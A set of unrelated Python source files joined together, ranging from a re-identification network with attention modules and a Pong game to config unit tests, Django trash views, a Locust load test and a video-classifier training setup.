# old_user = row['user_id']
#
# if old_user is not None:
# print(row)
if __name__ == '__main__':
reducer()
|
StarcoderdataPython
|
8036195
|
# encoding: utf-8
"""
@author: liaoxingyu
@contact: <EMAIL>
"""
import math
import torch
from torch import nn
from models.models_utils.rga_modules import RGA_Module
from models.models_utils.part_rga_modules import Part_RGA_Module
def weights_init_kaiming(m):
classname = m.__class__.__name__
if classname.find('Conv2d') != -1:
init.kaiming_normal_(m.weight.data, mode='fan_out', nonlinearity='relu')
elif classname.find('Linear') != -1:
init.kaiming_normal(m.weight.data, a=0, mode='fan_out')
init.constant(m.bias.data, 0.0)
elif classname.find('BatchNorm1d') != -1:
init.normal(m.weight.data, 1.0, 0.02)
init.constant(m.bias.data, 0.0)
elif classname.find('BatchNorm2d') != -1:
init.constant(m.weight.data, 1)
init.constant(m.bias.data, 0)
def weights_init_classifier(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
init.normal(m.weight.data, std=0.001)
init.constant(m.bias.data, 0.0)
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class ClassBlock(nn.Module):
def __init__(self, input_dim, class_num, relu=True, num_bottleneck=512):
super(ClassBlock, self).__init__()
add_block = []
add_block += [nn.Conv2d(input_dim, num_bottleneck, kernel_size=1, bias=False)]
add_block += [nn.BatchNorm2d(num_bottleneck)]
if relu:
#add_block += [nn.LeakyReLU(0.1)]
add_block += [nn.ReLU(inplace=True)]
add_block = nn.Sequential(*add_block)
add_block.apply(weights_init_kaiming)
classifier = []
classifier += [nn.Linear(num_bottleneck, class_num)]
classifier = nn.Sequential(*classifier)
classifier.apply(weights_init_classifier)
self.add_block = add_block
self.classifier = classifier
def forward(self, x):
x = self.add_block(x)
x = torch.squeeze(x)
x = self.classifier(x)
return x
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Relation_with_region(nn.Module):
def __init__(self, class_num,last_stride=1, block=Bottleneck, layers=[3, 4, 6, 3],
spa_on=True, cha_on=True, s_ratio=8, c_ratio=8, d_ratio=8, height=256, width=128,):
self.inplanes = 64
super().__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
# self.relu = nn.ReLU(inplace=True) # add missed relu
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(
block, 512, layers[3], stride=last_stride)
self.rga_att1 = RGA_Module(256, (height // 4) * (width // 4), use_spatial=spa_on, use_channel=cha_on,
cha_ratio=c_ratio, spa_ratio=s_ratio, down_ratio=d_ratio)
self.rga_att2 = RGA_Module(512, (height // 8) * (width // 8), use_spatial=spa_on, use_channel=cha_on,
cha_ratio=c_ratio, spa_ratio=s_ratio, down_ratio=d_ratio)
self.rga_att3 = RGA_Module(1024, (height // 16) * (width // 16), use_spatial=spa_on, use_channel=cha_on,
cha_ratio=c_ratio, spa_ratio=s_ratio, down_ratio=d_ratio)
self.rga_att4 = RGA_Module(2048, (height // 16) * (width // 16), use_spatial=spa_on, use_channel=cha_on,
cha_ratio=c_ratio, spa_ratio=s_ratio, down_ratio=d_ratio)
self.region_att = Part_RGA_Module(2048, (6) * (1), use_spatial=spa_on, use_channel=cha_on,
cha_ratio=c_ratio, spa_ratio=1, down_ratio=d_ratio)
self.classifiers = nn.ModuleList()
for i in range(self.part):
self.classifiers.append(ClassBlock(2048, class_num, True, 256))
for i in range(self.part):
self.feature.append(self.classifiers[i].add_block)
self.cls.append(self.classifiers[i].classifier)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.rga_att1(x)
x = self.layer2(x)
x = self.rga_att2(x)
x = self.layer3(x)
x = self.rga_att3(x)
x = self.layer4(x)
partfeature=self.region_att(x)
part = {}
predict = {}
feature = {}
f = []
# get six part feature batchsize*2048*6
for i in range(self.part):
part[i] = partfeature[:, :, i, :]
part[i] = torch.unsqueeze(part[i], 3)
# print part[i].shape
feature[i] = self.feature[i](part[i])
# print(feature[i].size())
f.append(feature[i])
# predict[i] = self.cls[i](feature[i])
predict[i] = self.classifiers[i](part[i])
# for i in range(self.part):
x = torch.cat(f, 2)
feat = x.view(x.size(0), x.size(1), x.size(2))
cls = []
for i in range(self.part):
cls.append(predict[i])
# return cls, feat
x = self.rga_att4(x)
return x,feat,cls
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict:
if 'fc' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
def random_init(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
|
StarcoderdataPython
|
6494765
|
import pandas as pd
def read_file(data_file):
d_file = pd.read_csv(data_file, low_memory=False,
usecols=['ACC-X-Ring1', 'ACC-Y-Ring1', 'ACC-Z-Ring1', 'GYRO-X-Ring1', 'GYRO-Y-Ring1',
'GYRO-Z-Ring1', 'ACC-X-Ring2', 'ACC-Y-Ring2', 'ACC-Z-Ring2', 'GYRO-X-Ring2',
'GYRO-Y-Ring2', 'GYRO-Z-Ring2', 'ACC-X-Ring3', 'ACC-Y-Ring3', 'ACC-Z-Ring3',
'GYRO-X-Ring3', 'GYRO-Y-Ring3', 'GYRO-Z-Ring3', 'TEST'])
return pd.DataFrame(d_file.dropna())
|
StarcoderdataPython
|
6454023
|
import urllib2
from bs4 import BeautifulSoup
def cricbuzz():
url="http://www.cricbuzz.com/cricket-series/2330/indian-premier-league-2015"
print "Getting updates from Cricbuzz . . . . . . . . ."
page = urllib2.urlopen(url)
soup = BeautifulSoup(page.read())
headlines=soup.find_all('h3',{ 'class' : 'cb-headline'})
for headline in headlines:
print(headline.string)
if __name__ == "__main__":
cricbuzz()
|
StarcoderdataPython
|
8124900
|
from Python_lxf.awesomepython3webapp.www import orm
from Python_lxf.awesomepython3webapp.www.models import User, Blog, Comment
import asyncio
async def test(loop):
await orm.create_pool(loop, host='127.0.0.1', port=3306,
user='www-data', password='<PASSWORD>', db='awesome')
u = User(name='Test', email='<EMAIL>', passwd='<PASSWORD>', image='about:blank', id='000')
await u.save()
async def find(loop):
await orm.create_pool(loop, user='www-data', password='<PASSWORD>', db='awesome')
rs = await User.findAll()
print('find test: %s' % rs)
loop = asyncio.get_event_loop()
loop.run_until_complete(find(loop))
loop.run_forever()
|
StarcoderdataPython
|
8089701
|
<gh_stars>1-10
'''
Factory to produce messages
'''
def get_send_header():
'''
==============
獲鴨自動腥野系統
==============
'''
return "================\r\n\u7372\u9D28\u81EA\u52D5\u8165\u91CE\u7CFB\u7D71\r\n================\n"
def get_body(*messages):
result = "\u8FC5\u8272\u8010\u6D74:\r\n----------------\n" #迅色耐浴\n----------------
if len(messages) == 0:
return result + " \u7121\u54A9\u7279\u5225\u5206\u4EAB\n" # 無咩特別分享
body_part = ""
for position, message in enumerate(messages):
body_part += str(position) + ".) "
body_part += (message + "\n")
return result + body_part
def get_footer():
return "================\n\u8DCC\u5C4E\u92EA\u9B3C\u672A\u6557\u8F4E\u6953\n================"
def construct_default_message():
return get_send_header() + get_body() + get_footer()
def construct_message(*messages):
return construct_default_message() if len(messages) == 0 else get_send_header() + get_body(*messages) + get_footer()
|
StarcoderdataPython
|
294469
|
class Solution:
def XXX(self, root: TreeNode) -> int:
self.maxleftlength = 0
self.maxrightlength = 0
return self.dp(root)
def dp(self,root):
if(root is None):
return 0
self.maxleftlength = self.dp(root.left)
self.maxrightlength = self.dp(root.right)
return max(self.maxleftlength,self.maxrightlength)+1
|
StarcoderdataPython
|
3268970
|
<reponame>15379180/pipelines<filename>components/aws/sagemaker/run_tests.py
# Configures and runs the unit tests for all the components
import os
import sys
import unittest
# Taken from http://stackoverflow.com/a/17004263/2931197
def load_and_run_tests():
setup_file = sys.modules['__main__'].__file__
setup_dir = os.path.abspath(os.path.dirname(setup_file))
test_loader = unittest.defaultTestLoader
test_runner = unittest.TextTestRunner()
test_suite = test_loader.discover(setup_dir, pattern="test_*.py")
test_runner.run(test_suite)
if __name__ == '__main__':
load_and_run_tests()
|
StarcoderdataPython
|
176559
|
<gh_stars>1-10
#!/usr/bin/env python
import sys
if sys.version_info[0] >= 3:
import PySimpleGUI as sg
else:
import PySimpleGUI27 as sg
import random
import time
from sys import exit as exit
"""
Pong code supplied by <NAME> (Neonzz)
Modified. Original code: https://www.pygame.org/project/3649/5739
"""
class Ball:
def __init__(self, canvas, bat, bat2, color):
self.canvas = canvas
self.bat = bat
self.bat2 = bat2
self.playerScore = 0
self.player1Score = 0
self.drawP1 = None
self.drawP = None
self.id = self.canvas.create_oval(10, 10, 35, 35, fill=color)
self.canvas.move(self.id, 327, 220)
self.canvas_height = self.canvas.winfo_height()
self.canvas_width = self.canvas.winfo_width()
self.x = random.choice([-2.5, 2.5])
if self.x >= 0:
self.starter = 'right'
if self.x < 0:
self.starter = 'left'
self.y = -2.5
def checkwin(self):
winner = None
if self.playerScore >= 1:
winner = 'Player Left wins '
if self.player1Score >= 1:
winner = 'Player Right wins '
return winner
def checkStarter(self): ###################################################
start = None
if self.starter == 'right':
start = "Right "
if self.starter == 'left':
start = "Left "
return start
def updatep(self, val):
self.canvas.delete(self.drawP)
self.drawP = self.canvas.create_text(170, 50, font=('freesansbold.ttf', 40), text=str(val), fill='white')
def updatep1(self, val):
self.canvas.delete(self.drawP1)
self.drawP1 = self.canvas.create_text(550, 50, font=('freesansbold.ttf', 40), text=str(val), fill='white')
def hit_bat(self, pos):
bat_pos = self.canvas.coords(self.bat.id)
if pos[2] >= bat_pos[0] and pos[0] <= bat_pos[2]:
if pos[3] >= bat_pos[1] and pos[3] <= bat_pos[3]:
return True
return False
def hit_bat2(self, pos):
bat_pos = self.canvas.coords(self.bat2.id)
if pos[2] >= bat_pos[0] and pos[0] <= bat_pos[2]:
if pos[3] >= bat_pos[1] and pos[3] <= bat_pos[3]:
return True
return False
def draw(self):
self.canvas.move(self.id, self.x, self.y)
pos = self.canvas.coords(self.id)
if pos[1] <= 0:
self.y = 4
if pos[3] >= self.canvas_height:
self.y = -4
if pos[0] <= 0:
self.player1Score += 1
self.canvas.move(self.id, 327, 220)
self.x = 4
self.updatep1(self.player1Score)
if pos[2] >= self.canvas_width:
self.playerScore += 1
self.canvas.move(self.id, -327, -220)
self.x = -4
self.updatep(self.playerScore)
if self.hit_bat(pos):
self.x = 4
if self.hit_bat2(pos):
self.x = -4
class pongbat():
def __init__(self, canvas, color):
self.canvas = canvas
self.id = self.canvas.create_rectangle(40, 200, 25, 310, fill=color)
self.canvas_height = self.canvas.winfo_height()
self.canvas_width = self.canvas.winfo_width()
self.y = 0
def up(self, evt):
self.y = -5
def down(self, evt):
self.y = 5
def draw(self):
self.canvas.move(self.id, 0, self.y)
pos = self.canvas.coords(self.id)
if pos[1] <= 0:
self.y = 0
if pos[3] >= 400:
self.y = 0
class pongbat2():
def __init__(self, canvas, color):
self.canvas = canvas
self.id = self.canvas.create_rectangle(680, 200, 660, 310, fill=color)
self.canvas_height = self.canvas.winfo_height()
self.canvas_width = self.canvas.winfo_width()
self.y = 0
def up(self, evt):
self.y = -5
def down(self, evt):
self.y = 5
def draw(self):
self.canvas.move(self.id, 0, self.y)
pos = self.canvas.coords(self.id)
if pos[1] <= 0:
self.y = 0
if pos[3] >= 400:
self.y = 0
def pong():
# ------------- Define GUI layout -------------
layout = [[sg.Canvas(size=(700, 400), background_color='black', key='canvas')],
[sg.T(''), sg.Button('Quit')]]
# ------------- Create window -------------
window = sg.Window('The Classic Game of Pong', return_keyboard_events=True).Layout(layout).Finalize()
# window.Finalize() # TODO Replace with call to window.Finalize once code released
# ------------- Get the tkinter Canvas we're drawing on -------------
canvas = window.FindElement('canvas').TKCanvas
# ------------- Create line down center, the bats and ball -------------
canvas.create_line(350, 0, 350, 400, fill='white')
bat1 = pongbat(canvas, 'white')
bat2 = pongbat2(canvas, 'white')
ball1 = Ball(canvas, bat1, bat2, 'green')
# ------------- Event Loop -------------
while True:
# ------------- Draw ball and bats -------------
ball1.draw()
bat1.draw()
bat2.draw()
# ------------- Read the form, get keypresses -------------
event, values = window.Read(timeout=0)
# ------------- If quit -------------
if event is None or event == 'Quit':
exit()
# ------------- Keypresses -------------
if event is not None:
if event.startswith('Up'):
bat2.up(1)
elif event.startswith('Down'):
bat2.down(1)
elif event == 'w':
bat1.up(2)
elif event == 's':
bat1.down(2)
if ball1.checkwin():
sg.Popup('Game Over', ball1.checkwin(), ball1.checkStarter() + ' started with the ball')
break
# ------------- Bottom of loop, delay between animations -------------
# time.sleep(.01)
canvas.after(10)
if __name__ == '__main__':
pong()
|
StarcoderdataPython
|
3551972
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2007-2015, GoodData(R) Corporation. All rights reserved
import copy
import datetime
import os
import pytest
from smoker.server.daemon import Smokerd
def generate_unique_file():
return datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S-%f')
class TestDaemon(object):
"""Unit tests for the load_config functions"""
conf_dir = (os.path.dirname(os.path.realpath(__file__)) +
'/smoker_test_resources/smokerd')
expected_basic = {
'bind_host': '0.0.0.0',
'bind_port': 8086,
'pidfile': '/var/run/smokerd.pid',
'stdin': '/dev/null',
'stdout': '/dev/null',
'stderr': '/dev/null',
'templates': {
'BasePlugin': {
'Timeout': 5,
'History': 10
}
}
}
expected_plugins = {
'plugins': {
'uname': {
'Category': 'system',
'Interval': 1,
'Module': 'smoker.server.plugins.uname'
},
'hostname': {
'Category': 'system',
'Interval': 1,
'Command': 'hostname'
},
'uptime': {
'Category': 'monitoring',
'Interval': 1,
'Command': 'uptime'
}
}
}
def test_load_config(self):
yaml_file = self.conf_dir + '/smokerd.yaml'
expected_plugins = copy.deepcopy(self.expected_plugins)
expected = dict(expected_plugins, **copy.deepcopy(self.expected_basic))
expected['config'] = yaml_file
smokerd = Smokerd(config=yaml_file)
assert smokerd.conf == expected
def test_load_config_with_include(self):
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
conf_smokerd = open(self.conf_dir + '/smokerd_basic.yaml', 'r').read()
expected_plugins = copy.deepcopy(self.expected_plugins)
expected = dict(expected_plugins, **copy.deepcopy(self.expected_basic))
expected['config'] = yaml_file
conf_plugins = [
'plugins:',
' hostname: !include %s/plugins/hostname.yaml' % self.conf_dir,
' uptime: !include %s/plugins/uptime.yaml' % self.conf_dir,
' uname: !include %s/plugins/uname.yaml' % self.conf_dir
]
conf_smokerd += '\n'.join(conf_plugins)
with open(yaml_file, 'wb') as fp:
fp.write(conf_smokerd)
smokerd = Smokerd(config=yaml_file)
os.remove(yaml_file)
assert smokerd.conf == expected
def test_load_config_with_include_dir(self):
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
expected = copy.deepcopy(self.expected_plugins)
expected['config'] = yaml_file
expected['bind_host'] = '0.0.0.0'
expected['bind_port'] = 8086
with open(yaml_file, 'wb') as fp:
fp.write('plugins: !include_dir %s/plugins\n' % self.conf_dir)
fp.write('bind_host: 0.0.0.0\n')
fp.write('bind_port: 8086\n')
smokerd = Smokerd(config=yaml_file)
os.remove(yaml_file)
assert smokerd.conf == expected
def test_load_config_with_include_files(self):
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
expected = copy.deepcopy(self.expected_plugins)
expected['config'] = yaml_file
conf_plugins = [
'plugins:',
' hostname: !include %s/plugins/hostname.yaml' % self.conf_dir,
' uptime: !include %s/plugins/uptime.yaml' % self.conf_dir,
' uname: !include %s/plugins/uname.yaml' % self.conf_dir
]
with open(yaml_file, 'wb') as fp:
fp.write('\n'.join(conf_plugins))
smokerd = Smokerd(config=yaml_file)
os.remove(yaml_file)
assert smokerd.conf == expected
def test_load_config_with_include_dir_only(self):
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
expected = copy.deepcopy(self.expected_plugins)
expected['config'] = yaml_file
with open(yaml_file, 'wb') as fp:
fp.write('plugins: !include_dir %s/plugins' % self.conf_dir)
smokerd = Smokerd(config=yaml_file)
os.remove(yaml_file)
assert smokerd.conf == expected
def test_load_config_with_invalid_file_path(self):
expected = 'No such file or directory'
with pytest.raises(IOError) as exc_info:
Smokerd(config='InvalidFilePath')
assert expected in exc_info.value
def test_load_config_with_invalid_include_file_path(self):
expected = 'No such file or directory'
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
with open(yaml_file, 'wb') as fp:
fp.write('plugins: !include /InvalidFilePath')
with pytest.raises(IOError) as exc_info:
Smokerd(config=yaml_file)
assert expected in exc_info.value
os.remove(yaml_file)
def test_load_config_with_invalid_include_dir_path(self):
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
with open(yaml_file, 'wb') as fp:
fp.write('plugins: !include_dir /InvalidFilePath')
smokerd = Smokerd(config=yaml_file)
assert 'plugins' in smokerd.conf
assert not smokerd.conf['plugins']
os.remove(yaml_file)
def test_load_config_with_invalid_yaml_format(self):
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
with open(yaml_file, 'wb') as fp:
fp.write('plugins InvalidFormat')
with pytest.raises(AttributeError) as exc_info:
Smokerd(config=yaml_file)
assert "'str' object has no attribute 'iteritems'" in exc_info.value
os.remove(yaml_file)
with open(yaml_file, 'wb') as fp:
fp.write('- plugins InvalidFormat')
with pytest.raises(AttributeError) as exc_info:
Smokerd(config=yaml_file)
assert "'list' object has no attribute 'iteritems'" in exc_info.value
os.remove(yaml_file)
def test_load_config_from_default_path(self):
# Any solution to test this case
# default smoker.yaml is different across nodes
pass
|
StarcoderdataPython
|
6499528
|
<gh_stars>1-10
# encoding: utf-8
# Copyright 2011 Tree.io Limited
# This file is part of Treeio.
# License www.tree.io/license
"""
Core module: Trash views
"""
from django.template import RequestContext
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.core.urlresolvers import reverse
from treeio.core.models import Object
from treeio.core.decorators import treeio_login_required, handle_response_format
from treeio.core.rendering import render_to_response
from treeio.core.views import user_denied
from treeio.core.trash.forms import MassActionForm
def _process_mass_form(f):
"Pre-process request to handle mass action form for Tasks and Milestones"
def wrap(request, *args, **kwargs):
"Wrap"
if 'massform' in request.POST:
if 'delete_all' in request.POST.values():
try:
object = Object.filter_by_request(request, manager=Object.objects.filter(trash=True),
mode='r', filter_trash=False)
form = MassActionForm(request.POST, instance=object)
if form.is_valid() and request.user.get_profile().has_permission(object, mode='w'):
form.save()
except Exception, e:
pass
else:
for key in request.POST:
if 'mass-object' in key:
try:
object = Object.objects.get(pk=request.POST[key])
form = MassActionForm(request.POST, instance=object)
if form.is_valid() and request.user.get_profile().has_permission(object, mode='w'):
form.save()
except Exception, e:
pass
return f(request, *args, **kwargs)
wrap.__doc__ = f.__doc__
wrap.__name__ = f.__name__
return wrap
@treeio_login_required
@handle_response_format
@_process_mass_form
def index(request, response_format='html'):
"List of items in Trash"
trash = Object.filter_by_request(request, manager=Object.objects.filter(trash=True),
mode='r', filter_trash=False)
massform = MassActionForm()
return render_to_response('core/trash/index',
{'trash': trash,
'massform': massform},
context_instance=RequestContext(request), response_format=response_format)
@treeio_login_required
@handle_response_format
def object_delete(request, object_id, response_format='html'):
"Completely delete item"
object = get_object_or_404(Object, pk=object_id)
if not request.user.get_profile().has_permission(object, mode='w'):
return user_denied(request, message="You don't have access to this Object")
if request.POST:
if 'delete' in request.POST:
object.delete()
return HttpResponseRedirect(reverse('core_trash'))
elif 'cancel' in request.POST:
return HttpResponseRedirect(reverse('core_trash'))
return render_to_response('core/trash/object_delete',
{'object': object},
context_instance=RequestContext(request), response_format=response_format)
@treeio_login_required
@handle_response_format
def object_untrash(request, object_id, response_format='html'):
"Untrash item"
object = get_object_or_404(Object, pk=object_id)
if not request.user.get_profile().has_permission(object, mode='w'):
return user_denied(request, message="You don't have access to this Object")
related = object.get_related_object()
if related:
related.trash = False
related.save()
else:
object.trash = False
object.save()
return HttpResponseRedirect(reverse('core_trash'))
|
StarcoderdataPython
|
11326107
|
<gh_stars>0
from pathlib import Path
import os
import random
from locust import HttpUser, task, between
import logging
def get_project_root() -> str:
return str(Path(__file__).parent.parent)
def read_file(file_path):
with open(file_path, 'r', encoding='utf-8') as f:
content = [line.strip() for line in f.readlines() if line.strip()]
return content
class User(HttpUser):
wait_time = between(1, 2)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ROOT = get_project_root()
PATH = os.path.join(ROOT, 'data/conll14st-test-data/noalt/official-2014.combined_incorr.txt')
self.data = read_file(PATH)
@task
def correct(self):
text = random.choice(self.data)
with self.client.post('', json={"text": text}) as response:
if response.status_code != 200:
logging.info(
'{} raised during handling following text:\n{}'.format(str(response.raise_for_status()), text))
|
StarcoderdataPython
|
3456067
|
from models import *
import logging
import hashlib
import settings
import traceback
import sys
import os
import string
import uuid
from django.db import transaction
from receiver.models import _XFORM_URI
def get_submission_path():
return settings.RAPIDSMS_APPS['receiver']['xform_submission_path']
def save_legacy_blob(submission, rawpayload):
'''
Saves a legacy raw formed blob POST to a file. Assumes the body of the post is
in the raw_post_data of thre request, and the metadata is a hash of the headers.
If the content-length is not present it will assume the size
of the payload is the content length.
If the content-type is not present it will assume "text/xml".
No return value. This is just a separate function to save the legacy blob to the filesystem
'''
submit_guid = submission.transaction_uuid
try:
newfilename = os.path.join(get_submission_path(), submit_guid + '.postdata')
logging.debug("Begin write of legacy blob file")
fout = open(newfilename, 'wb')
fout.write('Content-type: %s\n' % submission.content_type.replace("'newdivider'","newdivider"))
fout.write('Content-length: %s\n\n' % submission.bytes_received)
fout.write(rawpayload)
fout.close()
#file write successful, let's update update the submission with the new checksum
submission.raw_post = newfilename
submission.save()
logging.debug("Legacy blob write successful")
except:
logging.error("Unable to write raw post data: Exception " + str(sys.exc_info()[0]) + " Traceback: " + str(sys.exc_info()[1]))
# these are HARD errors. Don't swallow them.
raise
@transaction.commit_on_success
def new_submission(metadata, checksum, domain=None, is_resubmission=False):
'''Saves the actual db models for the submission and attachment objects.
Should be called after calling the save_raw_post_file method on a submission.
Any post-save hooks are probably called from this method as well.
Arguments:
metadata = request metadata dictionary
checksum = checksum value to be set with the primary content.
domain = domain doing the submission
is_resubmission = if the submission is being resubmitted from the filesystem
'''
new_submit = Submission()
new_submit.transaction_uuid = str(uuid.uuid1())
if is_resubmission:
new_submit.submit_ip = metadata['HTTP_ORIGINAL_IP']
new_submit.submit_time = datetime.strptime(metadata['HTTP_TIME_RECEIVED'], "%Y-%m-%d %H:%M:%S")
else:
if metadata.has_key('HTTP_X_FORWARDED_FOR'):
new_submit.submit_ip = metadata['HTTP_X_FORWARDED_FOR']
elif metadata.has_key('REMOTE_HOST') and len(metadata['REMOTE_HOST'])>0:
new_submit.submit_ip = metadata['REMOTE_HOST']
else:
new_submit.submit_ip = '127.0.0.1'
#dmyung - split up the ip address field if it's been appended. something we ran into depending on some gateways
#from our understanding the rightmost should be the originating/external IP
if len(new_submit.submit_ip.split(',')) > 1:
new_submit.submit_ip = new_submit.submit_ip.split(',')[-1]
if metadata.has_key('HTTP_CONTENT_TYPE'):
new_submit.content_type = metadata['HTTP_CONTENT_TYPE']
elif metadata.has_key('CONTENT_TYPE'):
new_submit.content_type = metadata['CONTENT_TYPE']
else:
new_submit.content_type = "text/xml"
if metadata.has_key('HTTP_CONTENT_LENGTH'):
new_submit.bytes_received = int(metadata['HTTP_CONTENT_LENGTH'])
elif metadata.has_key('CONTENT_LENGTH'):
new_submit.bytes_received = int(metadata['CONTENT_LENGTH'])
new_submit.raw_header = repr(metadata)
new_submit.domain = domain
new_submit.checksum = checksum
new_submit.save()
logging.debug("Raw submission save successful")
return new_submit
def new_attachment(submission, payload, content_type, attach_uri, outfilename, *args, **kwargs):
"""Simple wrapper method to save an attachment.
This probably should be an override of the constructor for attachment"""
new_attach = Attachment()
new_attach.submission = submission
new_attach.filesize = len(payload)
new_attach.checksum = hashlib.md5(payload).hexdigest()
new_attach.attachment_content_type = content_type
new_attach.attachment_uri = attach_uri
fout = open(os.path.join(settings.RAPIDSMS_APPS['receiver']['attachments_path'], outfilename),'wb')
fout.write(payload)
fout.close()
new_attach.filepath = os.path.join(settings.RAPIDSMS_APPS['receiver']['attachments_path'], outfilename)
new_attach.save()
return new_attach
@transaction.commit_on_success
def handle_legacy_blob(submission):
"""
Process attachments for a given submission blob.
Will try to use the email parsing library to get all the MIME content from a given submission
And write to file and make new Attachment entries linked back to this Submission"""
# only process attachments on newly created instances, not all of them
parts_dict = {}
if submission.raw_post == None:
logging.error("Attempting to parse a legacy submission but no legacy blob exists in the filesystem!")
raise
fin = open(submission.raw_post,'rb')
body = fin.read()
fin.close()
parsed_message = email.message_from_string(body)
for part in parsed_message.walk():
try:
if part.get_content_type() == 'multipart/mixed':
logging.debug("Multipart part")
else:
content_type = part.get_content_type()
# data submitted from the webui is always 'multipart'
if content_type.startswith('text/') or content_type.startswith('multipart/form-data'):
uri = _XFORM_URI
filename = submission.transaction_uuid + '-xform.xml'
else:
logging.debug("non XML section: %s" % part['Content-ID'])
uri = part['Content-ID']
#the URIs in the j2me submissions are local file URIs to the phone. we will get the filename from the end of the string
filename='%s-%s' % (submission.transaction_uuid, os.path.basename(uri))
payload = part.get_payload().strip()
attachment = new_attachment(submission, payload, content_type, uri, filename)
parts_dict[uri] = attachment
logging.debug("Attachment Save complete")
except Exception, e:
type, value, tb = sys.exc_info()
logging.error("Attachment Parsing Error!!! Traceback: " + type.__name__ + ":" + str(value) + " " + string.join(traceback.format_tb(tb),' '))
return {}
return parts_dict
@transaction.commit_on_success
def handle_multipart_form(submission, request_files):
"""This is a method for processing the multipart/form-data that ODK submits its data.
Eventually HQ should receive this information as the default way to transport the xforms, as it is more intuitive
to the server and the developer alike.
"""
parts_dict = {}
try:
#special case, we parse out the xform first and foremost
xformobj = request_files['xml_submission_file']
xform_filename = submission.transaction_uuid + '-xform.xml'
parts_dict['xform'] = new_attachment(submission, xformobj.read(), xformobj.content_type, 'xform', xform_filename)
except Exception, e:
logging.debug("Catching any duplicate saving errors")
#next, pop out the xform we just parsed out, and walk through other attachments if need be and do the same
otherfiles = request_files.keys()
otherfiles.remove('xml_submission_file')
for fkey in otherfiles:
try:
f = request_files[fkey]
part_filename = submission.transaction_uuid + '-' + f.name
parts_dict[f.name] = new_attachment(submission, f.read(), f.content_type, f.name, part_filename)
except Exception, e:
logging.debug("Catching any other attachment issues")
return parts_dict
|
StarcoderdataPython
|
3520537
|
<filename>train_test.py
import torch
import torchvision
import datasets
import transforms
import train
import time
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import random_split, DataLoader
import torch
import transforms as T
from movinets import MoViNet
from movinets.config import _C
dataset_train = datasets.VideoLabelDataset(
"file/class2_train_faint.csv",
transform=torchvision.transforms.Compose([
transforms.VideoFilePathToTensor(max_len=16, fps=30, padding_mode='last'),
transforms.VideoRandomCrop([172, 172]),
transforms.VideoResize([172, 172]),
])
)
dataset_test = datasets.VideoLabelDataset(
"file/class2_test_faint.csv",
transform=torchvision.transforms.Compose([
transforms.VideoFilePathToTensor(max_len=16, fps=30, padding_mode='last'),
transforms.VideoRandomCrop([172, 172]),
transforms.VideoResize([172, 172]),
])
)
data_loader_train = torch.utils.data.DataLoader(dataset_train, batch_size = 16, shuffle = True)
data_loader_test = torch.utils.data.DataLoader(dataset_test, batch_size = 16, shuffle = False)
torch.cuda.empty_cache()
